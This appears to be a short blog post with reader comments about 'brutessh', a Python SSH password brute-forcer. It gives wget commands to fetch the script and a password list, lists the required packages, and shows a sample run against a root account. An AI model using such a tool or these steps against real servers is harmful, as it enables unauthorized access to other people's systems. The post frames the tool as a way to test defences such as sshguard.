SSH is an acronym which stands for Secure SHell, which provides a secure shell access to a remote machine.
This brut force tool is great to test some security stuff like iptables or sshguard.
You are able to see the proceeder of real hacking attempt.
Like most brute forcing tools, you’ll first need a pretty big passlist. You can get one from here:
wget http://debianuser.org/bruteforce/passlist.txt
Get SSHBrute python script:
wget http://debianuser.org/bruteforce/brutessh.zip
To get it to work you will need this packages:
aptitude install python-crypto python-paramiko
To start you need some things to specify: hostname, username abd a password list.
This tool in work:
id@crunch:~$ python brutessh.py -h 10.1.100.4 -u root -d passlist.txt ************************************* *SSH Bruteforcer Ver. 0.2 * *Coded by Christian Martorella * *Edge-Security Research * *laramies@gmail.com * ************************************* HOST: 10.1.100.4 Username: root Password file: passlist.txt =========================================================================== Trying password... dragon
You have a typo in the file name.
python: can’t open file ‘brutessh’: [Errno 2] No such file or directory
stocazzo Holy shit! Thanks god ipv6 is not supported;)
not support for ipv6…
Please use a valid user. (default root)
hi there !
i did try ur script, but i always get a not valid passwordsi even put good pass i paswords file but it always say some password does not match could you tell me why is that?
best regards,
night
That was a crazy idea to make this public^^